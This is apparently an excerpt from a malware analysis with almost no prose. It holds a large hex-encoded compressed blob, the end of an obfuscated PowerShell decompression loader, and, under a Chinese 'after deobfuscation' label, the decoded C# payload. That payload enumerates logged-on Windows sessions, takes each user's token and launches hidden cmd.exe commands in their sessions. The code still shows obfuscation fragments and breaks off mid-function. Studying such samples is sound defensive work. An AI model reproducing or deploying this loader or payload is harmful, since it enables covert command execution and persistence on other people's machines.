eeb4b5a3eb847d9ded94304dfebc983073015b34fdfbc6d7fef65fd8b2e691d73bff8cea7e72f0ff65e52ea8f02a3d7b4da769ebfa5bc6ab9bef8e99714c79ebf6c1ebc7df1f2a72861f3c92f7a72f77276f082fca887c70feffef477ee3f78f153ef9e5390f78b7ef08baa599ddf5fd3ca3db90839ad167ff5c9b769f9f6078b87bfe8938315659bce7f9f77f5b75f4ed7cf2eefb5f7de9226fc7279777dfffce1e583e3fc2eadaffdde0f7f2fe2e72fa6f71f50b6ea41fe6ab7a1e5f79ff8f427b3bb07d94f5274ff74993d7cf87b4fafdebe39bff8e43bd72fd77bc5b75fe6e4ac5f7f79aff8a99794fab8f790b4df0f76defede0f57e5ef7d39fbbdf2bb4f7ef2074f7ffa93df7bf1f0deac3edfffa4febd89db2e7fefef4eef7e6741c98383fccd4fcd2eef6339acf984f2269f5072f7f7fece2bcae365346eca9ded5dad6ae2f9d55e4181fd657dfe8b9eddbbfbfade9befe69fdc5f2ec943a2c5ea5946a9accf5f52f05f3c7bfa32ffc1debd7b94c85ffea24f7e62f7797df08656b3c9e1a610ea7a76f9709fd652c9cda4d51b724fcfaf9f7f77e7eea7a4d0aedf1edc2d4e1f9edfdbfde4933797cf777f6ff206967bbff7dbbbd337cb4feb3d8a8e560fee3ddfa334e3c177aeef5dfea2fb0ff2abfbd4d7279fcedffc04b9c0d34fee97af290b714901e20f689e762f7fd1272f9e5f9e7f79f7abddc5657bb9ac72d2f194d3fb6e7e9ffc896b1ad8d5e5f3e539f1cbc3e641fe697b9e53ee34ffc1effd052d9653ecf090bc4cf22e97e435ffd40ff2d7bf0889ae672fa7f7de92022743f3c957144cbcbc4feec082bc8d87f9839c16dcee3d3898edd2eadffe53caf47d4acbe634a70fdaf30609ebcb97cf773fb9fbc905a5168b7b93073f45beea9bafeedd7d767742cb1bed43ca97be6d5e7ef5eed901b957c5a72ff71ebc9b2d5f96777f926c5c71f9c975be3c5fd6149b5e3c3cffbdd7f7bff37b7f72ef07148253befc72fad3bff74ffd5473f1f0f2e18b4fe7e49affe0c183e7dffda4fcc9cb035a23690e2ef71e52e046c112b2bb9f9e3ca7c8e062ef07df7dd8fce025e9e69f22d24f2eef9f53f2f1fce5ef433421dfeff8a7ce9b8327bff75b4a617c3abdbbbcfeeebbe6cdc3ef3c5c7c72706ffd80227d9a6fca817ffb8be7f767ef5e7cf7ee27bfe8cbf3bd9f3a780ba2e5af28c7f5d3f9e55707cdf34f0ed607b40e4179e6bc5e7e798064d2cbaf0ef2dffba7cedfbcdc5defaf96e73ff5edabcb077bcb7b5ffe603d59372f2edfb4bfe8e1f35df2de3fd9d9fdbdc9ef7bf603728f7ed1530a97ebf6f7baf77c7d70f9ea738aaa7eef837bb3bdf307df7939c152d0deefbdb8f7e9e5c1e29256f7ae415eb27d0f96135a8e79b86ecfc9f1cfef121b90065a5e4e3f7d38a97ff2939f7e7970f7fe9b7b0fafeeef1cdcdff9c1effd7b1fcc7f70f9e99bf34fcbe5effd49fe66fd53570f1e3cfcbd7faf9fae5b5a377af0eef9bd1fdccd3ef9bd0fa6e797335a2c383f38682e3ff9bdebfb57b4fab24b8e3e2d61d0cadc9bdf7bf6dd7bd4c73e99fc9faaf3ab4f273f7d69b29ba42ccb3794cd5c3dc752cd4ef9eddf07c1c04f7dfac9b77feff329596dca9edeffbd69d9e0c9dd2fcf1bf258ef66640c16df59bda318f755f9f653caddb4fb0f27cb6cb5acdebc3e3fa064c675493e1f3945777f9fbd37e488dddf3bf89258e0d3efe494f579d8520af9e583fb0f762971f7f209a5a40ebeb37bd94c4e1fee5e506ef0e9eb4f7ff2bb7711187cf1539fdc7ff1b2f9c1c37cf71e25a0ee5e3dcf5edebd5ad1f249410cf2c9277b4f57c4119f107eefbeba7bf9edcb970fe7b45c75f7e1d54ffe643bdbbf7e63629083fde7488b7cf7c5fd4f2e4922af777eef7ae7e1b3bb773fffa94f7ffa1e1946c2f0eecec54ffde0ee272794675b9e369f7ef2f25efef0e0a7cbcb86b2b80fcedf2c9b179fbc5dd2ec11310f0ebe224a7d72f0d32f7f9feb62995f92467e786f45cb49cbe6e59262375ae3a50456f5f0e1fda7eb779fdca3a8ea27efbdfc49d22b8acdf3c9794e8aebc1e70f5efedef78be748f6d122f5c1c19b7bbf77fd7b1fec50f6e1eeddafbefae407070fde509aea17bd6cf7f3dfbb3c3ff8c9f3f94f2e8f29e6f8c1f2fc93f9dee59b925cdea764331e3e7c36f92e29851f7cfbeefe8307dfd9a188edeee7e52c7f78f7a72e28aff5c9c1276f675faeaa87cfbf734e54fa2e69b95fb42687ffd38734c7b39f24af67ffed3ef95334b607e79ffcde3f6897e5177bcf960f1efee0a75fbef9bd77775664380f76ebea937727dfcecfef3e7b4324ffb2fc1299929f5cd5cddd939ffaeee56af9e5dd773ff9edbb4f1efef46ad9dcbdf77cd9ecdf7df8d5abfd7b0f2e2faf9f50bae0e027976f7f9f4fb2bbabbd7b3f49d98b7b77d7eb37b4ec401cf4e0c5f48afcd0cbfb0fbeb87bfee5e5f37b3ffd7b5d9e7f71f7e2795e90db43e27e40e1caf9dddd97b4bc788fbc5672c6cf166473283371f9e2a79ee5248bcbea2732a481495f4cae1f7ef7ee4fce7e6fca79c3564ccb9ffaa9fb6f9ebffae44ddb509e9e16d5481d7cfef09c822cb281f9ddec35f9153f78f8edf3ddebe207e7d3bb5f7cf1e2dbcd01b9c4bfcfbbfd7bdf6e77ebcf1f904ff7e63e65ace04b93fc7c9a9325393878f7d36d41ab0b7b0f7f6f52cb4f9e92eb48b2fe664a79ab6f9fdd7dfee6bb94096a97e4ff7d7a6ff9f6eea7df797af721c55bcbbd877bdf597efec5bb830714d5dc9bdcfd459f503aeffe570bf2fb9f936f734962fd963224bff7cb67cdc14fbdcc497ee09e2fee7eba2243b8fff6175dfe5e2f3f218dbdfb9dc501a5101efee4ddfb33f2947e0a2bc830055f3e2ceeddfdc1abef7e42eb0e3fb83ff945773f2549bef7edc55d8a0149b23f45ae97267342d69f7270f7db17e7afde11da3fa065c15ff4e4fceee59b4fcff3e7ebe9ef753e79b1783bbb47ebf53ff5c9e4bb64a0483228df7cefcbe5c143ca62913b77490e65f570ff6e5d5ffe3ec5e4ded32f3fbd9befbf25efffc1dd77afef7d3aa3f532721996afcb9dd9173fb5f7667df7d9931f9cbf9cedee4e2911ff607942e6fae1d529b9d9a4771fd0aac277cedf7c57c56375af79b85adc7b36bd7ff0f2c127dffe89bb0fef53a474fd29a57bf3c9ee2fbaf77b538070ffe5faea934f3ea1d5e14f0e76665ffe348feed9fad34f8aabbbf726bf3782a5cbdffbee5df26c493bdfbda445a0bdd92f7af07bbddd79b9f37bb5e7e76f5f93b3349f9171ff01851497bf17ada6dc9bfd5ebb0f7ff05397e59397d34f570f0e26e7f77eeacde5c31f7c7befe1c1cbe96b4a3ffede5f3cf9ce25e7619ed7e7f72f287df3a4dca15875fa83d75fdea32078fef2937b2525392fee3edb7fb5fbed757e7df7f7ae5fdca5f5147264d6cf7fefbbc50f2882baa434d84fd7f94fdc9de60f9fbc99521878f5e621ad9efda2d95d5ae0a2258ae75fde3fb8bbfabd29acf97dee96cd2f7a70efc5ef4d698d7bab9fa64c3d855a8bbb570f170fbe7379f5f4f79e5ddefb648f66fd41b3b8ffb098dc3d78fe72f609e5a39e4cde90b73c7ff8f2f76e724abf1283defda4c91f5c3e58af9befbca124ccb23a7f787d7ff9edcbe984b2a55fec3ff8bd7748a64f9e7df79cd87b9f5c9f2f7fead5c3dffb070fca379497261df7eef7a615e8fcddbb4f9f3ffcf2092d7d3cddfbf28022bf9fbc5cd7075fde7b59538879f09496e00f1e7ef5e9f35fb42693fa530f767ef0f265fee0f7a6e9a548e6dedd8325ad03ccebf37b77bf3df9a9ef9007b8fbc90fee3fdbc5f2d5ef9ddf3db8baff7b7fd93cf8450fbedc273d3fa335defd8bc9657342bcbbde2ff61e3efce91fd0b267dd7efaecfcfc8befec3ff83689e04f3cffbddf3ca355b6870faf3fbd585ee68bfb2feffde4e5832b4a5cecadbf4d4e5a7e555214befcf4c5c35f443f1757d7df9e7dfac983973ff193cfce1eee519474fef2edb3e9dd8b4f2fa77729edf783d76f3f7ffe132d252cd6d5c10f28f593153f589f9f3fbb7c70f034bf77f7bb9f7ef2fa3e0571f9f3d7ebbb3f75be98cebe7df070effe5bca5b3ca4a0f7fcfad3bbcb657efe7bdd6dcf3f7df2938b2bca78bffcbd2feb87331aebf5b7bfa8c8ea3fdcf9eef92fa2c8f4f7fe094ad0dffba94b6272747dbef80131639113c3ed92e738a3488bc64ffafef7faee274f6a5a35fe64f7f7fef2fedb4f69f9206f9ed1e07ff0f017fdde9fac9f2ea7f7bf83a459f3d3cfbe3cf889e72fcb874f9ed30a3b39eddf9953629816ee1fbcbcbfa608f7934ff68b072fbf4d9af53ccfae3fbd776ff69d87c5eaf2e54f9108ce7fb0fee4fa2bcabb3fb9bc2457fca7efbffcee0f76ee3dd87b40e179f9bcba5fffdee755f69a3ca4f535a5b99f2c779b675fdcbb7b756ff272f9ec454b315d59edfc5ee5b3f9ab07675f66df79557e7a7ff2e6173dd8fb74fa7b7ffafb7c7af7e407c77b3fbd7ef3e52707f5b7df36f3cbe9f9e2530a351e16f777bebc38a025ed4f7ff02adf7df97bbd7c49292bf249691de3c1b7bffc7dee239dfde0fee5f4e03b0f8a1d5af22349a745104a2c93e7f97c7970fdf4de970fef3ff8e9cb7b84252588ae1f2e1e1614b11e3c202efde43e05f994e1ba77490b1f149d7c42f27139fd293223d9e5f3dfbba11ce5efbd5cdfbbf7c9cec1eea7bff7ecf721edfee0e52f7a422befdfa11426e9c10777dfac7f40b9d9dffbf7bafb86d6a07feab2395f4eb2bb77c971de23823d7f481e1fbd337bf87276552c2987bc8be4defd72b1fb9cacc297df7db077efcd939a129dbbf7173f7979efe0db5f7ce7e0debde73ff590a2c2929646695df7f27c39fd32a7c5aee71459fde0ee2f7a9eff14659bd7d37b642568ad7ff7c1c34f48760e3e79f28696e13e2d0f0eee5ed7d5dd9fa6d0ecb2debb773eb97f97005c5fd222ebe2f99492a3afee5fbef9bdef2d29d3babf7e7a793dbf2067e693d97276efcb07d3eb8b1ae37a40c992dfebe54fee92ea258fffa73efdc177ae69c9ecfee5effd9a525794d89efda24fafeacb2f8dbb94914adc297f70777a97d62faebef3f2ec134ac3bfa1a5a39fbc7f796ffee617dd3fdda16cf9f4ee04abc5bf3727332f1f900a59fd604939fb4bf2bc9ed0f7079fbca32cefc9fd839fa6d8e2eede0e89ce275714195d92927bf9fbbcf9bda70fde3dfdbdbf68efffe0e5ec3e25765edea525d897e446cdeebda0d99f2c4971bc42ea985629ef9fdf9b7cfaf0073ff8bd3f5d2f7f2f4a6fb63ff9f2f7f964f5b2babb43ee1ca9983713ca8453ce794dd6e4e95b4aa1d1ea784e41e6e5f54f34942c6b9f5fbe216371fe7bb7b34f7ffacde5dd1d4ab861c5f0fc3e252d1ebe7cf9eae1bdfb0f1eee3fa5153cca309fdf3df84e7979f0c97246d12f992e22dff5b7697174f99dcb872f291ff5c9276f7ff072fae5fdd9eff5e6fc271ede6b69f983a2de5f44c1434eb9ea7b3ff99d9f2659a1457a4a661de09fe7145cecbefbbd2ff3073ff9e67c36b9fac9df7b4d2b3e0f96ab5f74be7e387df2908c0cf9c4bbcb927278e77bcf2966fae42925d10fae96dfa66cc3d5e4de8bdf6777fe94f4c0eaeedbdf7b36b94f5ae1fed32f1be2cd2f1ee464990f48117cf2292dc07cf262490b266f299f57ec9ddf2d9f7ffb93fbbf6845637a706f76f7e4f5279f501aff65dbb4eb079f52a2edddee0feeee7d87163e1e5292f13b3f45cb7434dafccdf9ab7bcf7faf970fc9ccddbf4b41236572aebf3cbf7bff075faeee7e4a6171b6aa498297bff732cb0f7ed1fd7cefc1f98a54d5ce75fe83f5e2f2cb2905a6cbcba67cf070f9034a46de5dbcbc571e3cbcdefbf6ef4dabf1f7ea9c5831ffe4ed9a962d0fbebdfee4e17773329839ada31d3cf97683a5b34f1efede5fde2db235d1f8ddeffddde5fddffbee77de7d7b79b0f8cecb973f39fd450f7f9ab46af3e0e00794bd3a2011bc870865f97bdf2f69e990bcd90757734a4813cb3e251bf8d50f281cf862f6a0f9f6dd1965a029397aefcdb3cb4fdebebabbac9f7f97327ff5e47256bec032f34ffdc4a7f77ef0f2f26cffdd5dd2fb149a7df2706f7799bffbce0fc812ffdef73ea1fc41fef0f77ef609a55f68ad0749cecb7bf79fe73ff9ee2b4a197ce7fc937bb468da5c502437d9ff64593effbdaedb9d9ffcee75fdf9eb49f9e98336afcfbffca47df1c9faf77a72b277f745f5e0d9ef9d5d4e17af3ffda9bd267fb33c7ff572be4739ccf9ab279f5f66ef7ef0ae3a7e436b722fbffbba5a5c7f72fa7a46ab1b3ff97bdd7d41eeefc5ef9d7fb9f3d3a7cb97ebe7fb6f96775fbd5e9d15c7e7679ffedecfbefbc9f3e527675fdc5d5f9c9314fedee47c5d3eab5fac0f5ece9fdd3dfb62f2eceedee5fe6b0a2f76288c3c5f522cbcff83c54fff3e271797d5ebf3fc8a7ccf9de503b2a33be5dd7bd307dffe89b7cfe7cbd3c9ebf32f296530ff6a727f72fd8383bdf26ce793f9ddf9bafdee29e5fa77773e79f2ed87bfe8ed273bf7af9abcfdc1fe4f53bee9fc27bf5abf24ddfa69f9e4dee5e4de9b1fbc79fe7b5f5cfcd4bbbdf5b3d5d36afde4a77ff0829ca89733d532d527e597df797b36fbeeab5f54fea2cbddefbc7afaf2e5d35793f3e68bbb9fdcfff6779fef2cdb9fdc2b175fcd575f64b3af56edc9777fef979fde7df3936707bf7775f1a2de597ff183070f9fd384e7fb5fb6bfd76576fd65fb6efd8b8eb35f7430f9fcbb9ffcf4174f1fbedbdf99eeeedffdc117f7ae9ebefb0e257126dfa69531720768ede1d36fbffabd0ebe2ceb7b273fb8fe45bff7e43b3fd899ce9e1c7c7776b0fbc9135aab7930bd6c675fed913771f293b3f90feabde52979650f29bd42abf4e7cba78bfcfaf2f2db3f75f7eef37be73b9f3fa09cf0c37bf93dca76640f7eb068ee3e21aff307392577dafc27165f4e9eefed2f7ffacdddd9fcfa07afdffdde3b2fbe736f71f0edefb6bf0f2df7fcf4aa29765fbe797039bbbbf889d5f3fae957df595ebcbbfbf2ea78bdf3134f7eef69fedd87e7c70fef2d7eeaa7aebefdfce1b7efbfba7bdefce0dddec3fd77d54f3c3ca044d7836fdf7df0eea0beff8602a5a67ef874affe6a45acbe9ad56f767ff0e5793e7b577cf7ab7707d3c577bebcbbfee4bbb438f1e093dffbf77a78fae2f41751a29b54c327bfcfc3ecdefa6c3599153ff8f24173efbb93f693bb57d74f1e3edd39ff7679f0c9f4f94fefdda748e4d977dffda2ec8b776f16f74e269f53de6d557ff9aa78b25bbeadf3ddf32f3e7dfd8327b39f38b977b173fa76e7dd2ffabd7f9feb079383e2dece62f9e597e484922751ae1fde276ce75f5dbf98df5dbefee4e02d09e8fdef1e1cdc2b28cbfff0939ffacea4feeef317bff76287c298d75fb5d31ffca0f97da6afdbf9a7d34fa9b7a79f943ffdfbec4d29217efae9eff529c5b6ebdffbf779f7f6939f5c5ceebebcfb9ddf67f953b3fbef7eeae5f9b73fbfb87efde0c5f493cb4f1ebc7af3e5eff580a29aeffedebbd3cbfcf5bd2fcef6efbe7cf8ee7c6f71f0d32f5ebeb8beff60551d2c28d970426ee9f2a23d78fee6db3f317b7670f28365bd377bf0e6f7def9e9cb1fecffe07295b597948fa4e06a4dda7995bdfbeef23beb4feb363f2e5e15bfcfe7df79f2132f175fae7efaea075f7c5256e4b2fe60ffdef9172f5eed2debeacd0fbe7bf0d5c14f4fdebdfbeed3cbb3e75f7df953939f5cfed4f9fde9ce7a7efec9b78bb78beb97f79f7d67f2e9fe4f9f3fa5e5dff2fc271faecf7fea75f9e6f9e4939f58d4bfcfce8b573fd8ffbdf7a6a4ad76ae763e39985f239d39ffeebdbbd3ead5fddf67fae2f9e2f7fa82a2ff1f2cce66f5ceebdfebc5deba3a3d2f28407f7dda7ef7d5b7ef7e3529e6abd5e9e9747df0fcdbf7a65fdc2fcfef7f7a6feffe573f399b2d8aeb4b92812f7fea3be74f5e7f35a375d69f7efde0c9efb57ab5bcb77837b97bfe7b3f79f7dde6ddf21e25a69efd24b98f9f3cfca9379f5cadeebdbcbf33f9bdbfdbd2d4dd5b2e2e7ff2d5bdcfbfbdb85c9e3c7df1c93b12fbefdc7b49e9b6bddffbfcf4f7d927767df58bde1c1ffcf4f9f21795cdd52c3fffc917edc367ef2e7f9fd7a7b4f6fde2a7ee1e3cac5fac9e9053fc932f767faafcf68c5c37b27b14a4eefe5edfdd5decd16869c1f3e4ddef93efeeecceeabbf77ed1777e9faf7eeaa7deb53ff9864cf4ee4f7ff2c92ffaee01c553b4f6faea177df16ebaf77b3ffca9e733324a3fd8a99bfb93275f9dbf557d33bdfec1f9ef7d30f9e9e672b2581c3cddbfbb7c93af1efee4d383f3b70fcaf6f2db177767b4e678f0a2fea9cbeacd4fee2dd7655e2e17afbe73b15eedce3ebd7bfaf0db64a18be5decb4f9e7efed5f4f37bc56abd7a33fb64fa7236b95b7cf7edfae5ecf9779f2df7bebbfbc9de8bbb3ff8a9c5f9bd965651f2e3a79490bbffe5b7bf24da9c67b4b871ef5e7efc83735a3b21ffb5bddb7c7977355f5e2fdfd2aad6fd37abdffb07afee1ebfbb779f96965e3e793a2b3fff89b377f75eeefedec52707fb145f5fbe7cf9e5fdfb3f689fb7cb77bff74f64075fd1dae3dd4f5e3f6c762e7ee2c1d53b52ae77efcdef7d7270b058beceeffef4bb4bf242ce96c4b3abfa931f3c68697d8f68ffc9bdbdcba7ef5e56942cfde4e1ceeadebafda94f7efa075fe677cf3f6f9f7f4ae1f2dbc9ecf5bd4f7eefdffbd3bb2fbebcb7c89fd775b3be5effa2c90faa9afafff4d5deb7670f3f59ec35bf687f32fbfcfcdb27d441fee0ddef734a699bf5cb87675f9dcf97cb574b4a483cfcbd9a4fabfb07eb770fae9f13df175fdecf970f3e39f9bd7ff0fa6efdd5a2f864f793f37ceffcc9773fdd597f4a4ae2a7da9ffe7dde3d9c7ce7fe4fffe0de6cd19cdf9b35f7663f7df9c9f4f79ebcb8f7e94ffe22f20a1eb69469bc7b6ff5e2fe4fb6bff70f1efef4eeabeb077beb4fdfde7bf6eceec50ff69a4fc9967ffbdeef3dbdff7bed35dfbd2ef383ec2e757a7eb95bd6554d8bb00d60173fa050fac5a7b3fac1e2eefddd079fae5e3db8feaafdc9ecf979fb83e2e007df3eb87fefe5f945f38b8e3f2f96dfa9dbd75f4e5e4e9efcc4e2a7a60f7f40abea77bff3e5eefd2f3f25a097974b4ab1922b77ffe1c383bd9f7af0c5d3b7cf16bb3ff953dffdc9c5f5935f74fd8b565f5cbf5aed3e79f03acb7f70f6f9170f7ee2f8f4edeff3e6faf4e2c9d9c9fcf5b7f77feffaab87bf17d98ddfebdedef3c55745f99d774f7e9f6fefd02ae57d4ab26d5d2c0bea7bffd3bcc99e2caafad9a347df6fc9855a5627dfdb7a7afe9d9f1e6da58b2ca726141d2cf22fc65f9ea5ed34ffe9c997db57f90b6e611ae46d56d25acf7859154d93d7ab4575126d5de7b32c7f25ef441aa4efae9e7e7e7af61b27bf71f2e4f2275e4d9a9f1ee70b7aa3fee2f7fef4a70bfee893d5a27d74b9ccd1fcb3e6a77fffb6cdf0ab7d655acd62efb877a841efa5e7afbefafd4f5f7d79c27f7c56d6ebdf9f4832314d7ef19dddb4bdd84edbe5ba9a8eefbcadaab25d7fc928b5e75553d5d3e20bfeabcca6d573fe2da30e56ab63fe3d5f64cb3a6fd60603feb0a14fbee2df1e9da48bbc2d6665319f6eb7f9c5d6d679815e798a7ecfcff25935fdfdcb225b186cf269bdae1afe332572b7c5b220cae7abeb37db29ff3b9b1da3ddefc983c16fbf84ff49e9c12ffa6be44ff351f0c1e087f68b1f1bfae6f0ce6c311d2df3b7d51b8c76be4acff37a8bff9eb7c5778951a624ee6d9db5af7f6c0310e1046a3c5dbf4ef9ed94d86d5a94abf553fe6e2b5f16cf8984f577c7795935c4bec3e07ef1e03777ee74304d47bbe9682f1d5575fe53e3ba7dd92ecfd2d14e2a0302e5b36545d3b85a9ccdb7de9df2a716afadf4bc78bf2189e4bc4edbfcf3a1410dc1fbc5435fe890425c65684fcfb4c371d16cd9815fd38af84fbc7ef35da03f04f4f08effee278ceca3a767b718c020c4fc07c5eb76992ff2f2f43aabeb2cfdec1312b6bcaed7d3c177eedcf9f2d98bb3dfffc59767af5f9fbefefd81f47945fcdfa6a33bfaeed61d99b5adadbc5eb7d335e91c1a66fb725c66f3a6cebee843483f4b8b26ed7e3c84438fee4cf34f3e29d243a88a13a148933e4ee9931dc0a65115a404abf3d89b8777b6f63f2574ab37e3ea7c6968bca2f70c2df8ebd8ab01268c0575f7bba677023478de03c886c9770226df6ab40171739d2fd6cbd3084788ea38f465e3b3d41720fdb0f3caf0b46d9d7f0936307343d07a5c41c4ebc1db61f278a38c350ab10c48308066645c1d298abf6827822781d45fca36b6d99a2d4ea6f9bbd3d9f2d85017844d674575994e0970dbd08f72b25ef9003aaafaf08eaacc393308fdb6dacacbd932fb76de5465205eaa7ec972cedfdcb6b59bbd4deda0f07fecc7742eb7c8e5a94ff7ee2d8befb64df69c44dfcc5f4c27e3358af2a08405429a37659ef6ec4f473feaa0533614b7d18d3189205d68a890b6ebca6f6e5e61d94027222ab11665b95e46bfb85c9eaea25f341759f98c5927af4fae66d13644852caa1102d3f375be270614059d4eefcacf582bfe267f978fa939bb24fccf1ef9e56d73ddb84f9aab6ab62caef4039a49782fd361b81e43e1dfe6986792deab5fe64c8f98523964786db9ce28b1e0fadea169a1bea5b3cfd255d5be6df2a7ab72ec26ad0b6897da31f9af661b5a4181f0b8be7b55cd5f5f6d6ab9bbc3cfbb9df4273f7fdaeea73b3bfbe603edc99b68d243ebbb778da8c89b07eff16eaf7bd19c2fbf7af3eaf8cdeb41a539990e8f409171f21b88d9db69553e81a9592cabba20864e6592065d2c816264f9ce1d66636fd24528e0f231680fb2ce3eb9488a49a86ef9bd21fbb145a6e3cdf117afd88c900d39f9f2d5cbf42a5faa6267017fa1f1b8d7d2b4ecc3f3a8eac11102fadf75de1cd2f41e01cc1806bdde40fd13512e0b42de03dbd5ffd4845e7afdfaf8f9c9ef7ffa86907a7372fae2c59727eca45c97cb0a0abf63471cac430a445e3097b5af89dd5782f0eb9b5efc3e7951af5f3e1f23b698e517d9325b2cbfda6a8e95e7be17e9c83a88e9de3d22c057377511d0b2e77db1e716a5cff7ef9459417cb5fe45e48b9208ff5ea4d9afb3e75bf2433c3e8b5f84a0143b9d75fc3b515c57d5d3d8e76ddee4afa22f90a62c9ec7be214b1aed629653e8bb5c56d3a68876452a299bbf8e7dc33ebabc7cb20972f4cbfcb268a7c7916f822918e030f258f2dbb0293b05b3f6b51580f8ac1fb6eb15c5d1b76bb83cbb45bbbd597e59638e5665b7e550cbc994fc8a6adef5be6c43cf346c6ea8964674f7409bbc5d4f48e4dae3b22c6e6a4bb2353f61cff6f7b975cbdffba6fec956dc040d6d6e8273138c1bf128dbe20dcd912aa08156d6c6dfd0ce9bf4cd0d31d7141ddc520719bdffb3a77e0e6767e2a1df40aed9991a8d9bda89bb7f03eb9b186273b3801c31936bc8a2a6f61ba1cea104ac2b9e26e78393c7681b0501acf5123afe3a3744a33aff490d08c3ef0ccb44bfacf1a5d3359dafa3d131c3a1245ffb2edf60cebf7f27a7419383c10a5202a6d7a9b8df65391bef51c23f6b5a7172b748db50a059964f7b44125f2218fc68664d2e38a49fd149cbaa9adc16c5cf3623f8dd9b106c494faeb2e5eb39664e930a7e48f93eb86c2257991390b73762e31c4f6b177a2ee97545dc9c3fbd356ad4eec9904b943e5ad66b5a960f30b96934941c4692f8c6c114753e5f9e4d045171362dab8e6243dde081df7ab4df08eac201619e74930097f965fe3cc8ba44c515932029d4d8b78ddadcf658b4a3234baf25e2a0e3595e17c4070341d8c81b03d91a72fade9d0ee9896e4af8d6c4663a76df36812f6155bdbcae5b0acf3a727939cb6e541c20e6a2860a552b40e4882af730436215ef6acd710bbde55bc8d8e4d18a11b9a175f154729727ce38775b4679b6dbe83611b24e4e28213d40b7e707dbd2d16aa0298263ea7a41ab5ec3e3b4d1172674753cdc3094e9ceb79c49519bab0915934db9358395657642de3416eb88f858ee234cf021529dbdcf4645b33c1e93c4c3cd0407ea6fa361a5e0657b0c72df04ff3ed38773264f5d90f8f4ecf9f14fbe3813a6a0345135ed8f5b3d1ac061034e11dbbb5393596c9aac9c1a92397f088d7f31bf5116ed57693ecd560d16f3141d7ab980a740466e45090c9a2c5a7824eaad5f8d3973f61a13dcacb96df7031e292dee4ded5a1ecde7d6d61dfa97fe4734face36fd7c8789fefebdd1eef7eee4d3e5e9abd367b4b47ada549357a797ed62fafd8b17c8387c6f2bdd1a7fbcb5b595def9f8635a3ef8e9edefdfdf1b7dba37daffdef4f4e5eb2fbe9c3efac917a7bf5bba958ed38feea487c58bcbeaf7cab7f3772f09f9e6eccb17f4fe45fe66bb78932fd274ebe3cbe35734a4e2f809fd5b9e3e42c26efe62f6f19d34bd33a615ecaff2ef6da7bbe3f176baf57eaf8dc95c5fbcf9767ae7fbe9f677be3c5b7efc717ae7374efe1f'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
去混淆解密后
('$msource=@"
using System;
using System.Runtime.Interop'+'Services;
namespace Utils
{
public static class ProcessExtensions
{
private const uint INVALID_SESSION_ID = 0xFFFFFFFF;
[DllImport("advapi32.dll", EntryPoint = "CreateProcessAsUser", SetLastError = true, CharSet = CharSet.Ansi, CallingConvention = CallingConvention.StdCall)]
private static extern bool CreateProcessAs'+'User(
IntPtr hToken,
String lpApplicationName,
String lpCommandLine,
IntPtr lpProcessAttributes,
IntPtr lpThreadAttributes,
bool bInheritHandle,
uint dwCreationFlags,
IntPtr lpEnvironment,
String lpCurrentDirectory,
ref STARTUPINFO lpStartupInfo,
out PROCESS_INFORMATION lpProcessInformation);
[DllImport("advapi32.dll", EntryPoint = "DuplicateTokenEx")]
private static extern bool DuplicateTokenEx(
IntPtr ExistingTokenHandle,
uint dwDesiredAccess,
IntPtr lpThreadAttributes,
int TokenType,
int ImpersonationLevel,
ref IntPtr DuplicateTokenHandle);
[DllImport("userenv.dll", SetLastError = true)]
private static extern bool CreateEnvironmentBlock(ref IntPtr lpEnvironment, IntPtr hToken, bool bInherit);
[DllImport("userenv.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool DestroyEnvironmentBlock(IntPtr lpEnvironment);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool CloseHandle(IntPtr '+'hSnapshot);
[DllImport("Wtsapi32.dll", SetLastError=true)]
private static extern bool WTSQueryUserToken(uint SessionId, ref IntPtr phToken);
[DllImport("wtsapi32.dll", SetLastError = true)]
private static extern int WTSEnumerateSessions(
IntPtr hServer,
int Reserved,
int Version,
ref IntPtr ppSessionInfo,
'+' ref int pCount);
[StructLayout(LayoutKind.Sequential)]
privat'+'e struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public uint dwProcessId;
public uint dwThreadId;
}
[StructLayout(LayoutKind.Sequential)]
private struct STARTUPINFO
{
public int cb;
public String lpReserved;
public String lpDesktop;
public String lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttribute;
public uint dwFlags;
public short wShowWindow;
public short cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
private enum WTS_CONNECTSTATE_CLASS
{
WTSActive,
WTSConnected,
WTSConnectQuery,
WTSShadow,
WTSDisconnected,
WTSIdle,
WTSListen,
WTSReset,
WTSDown,
WTSInit
}
[StructLayout(LayoutKind.Sequential)]
private struct WTS_SESSION_INFO
{
public readonly UInt32 SessionID;
[MarshalAs(UnmanagedType.LPStr)]
public readonly String pWinStationName;
public readonly WTS_CONNECTSTATE_CLASS State;
}
private static void StartProcessWithToken(ref IntPtr hUserToken,string cmd)
{
STARTUPINFO startInfo = new STARTUPINFO();
PROCESS_INFORMATIO'+'N procInfo = new PROCESS_INFORMATION();
IntPtr pEnv = IntPtr.Zero;
if(CreateEnvironmentBlock(ref pEnv,hUserToken,false))
{
Console.WriteLine("Create Environment Block Success");
}
startInfo.cb = Marshal.SizeOf(typeof(STARTUPINFO));
uint dwCreationFlags = 0x00000400 | 0x08000000;
//uint dwCreationFlags = 0x00000400 | 0x00000010;
startInfo.wShowWindow = 0;
startInfo.dwFlags = 1;
startInfo.lpDesktop = "winsta0\\default";
if (CreatePr'+'ocessAsUser(hUserToken,
"c:ij6'+'XM\windows\\system32\\cmd.exe",
"/c "+cmd,
IntPtr.Zero,
IntPtr.Zero,
false,
dwCreationFlags,
pEnv,
null,
ref startInfo,
out procInfo))
{
Console.WriteLine("Start Process Success");
} else
{
'+'
Console.WriteLine(Marshal.GetLastWin32Error());
}
CloseHandle(hUserToken);
CloseHandle(procInfo.hThread);
CloseHandle(procInfo.hProcess);
}
public static void EnumSessionsAndExecCmd(string cmd)
{
IntPtr hImpersonationToken = IntPtr.Zero;
IntPtr pSessionInfo = IntPtr.Zero;
int sessionCount = 0;
int arrayElementSize = Marshal.SizeOf(typeof(WTS_SESSION_INFO));
IntPtr phUserToken = IntPtr.Zero;
if (WTSEnumerateSessions(IntPtr.Zero, 0, 1, ref pSessionInfo, ref sessionCount) != 0)
{
Int64 current = pSessionInfo.ToInt64();
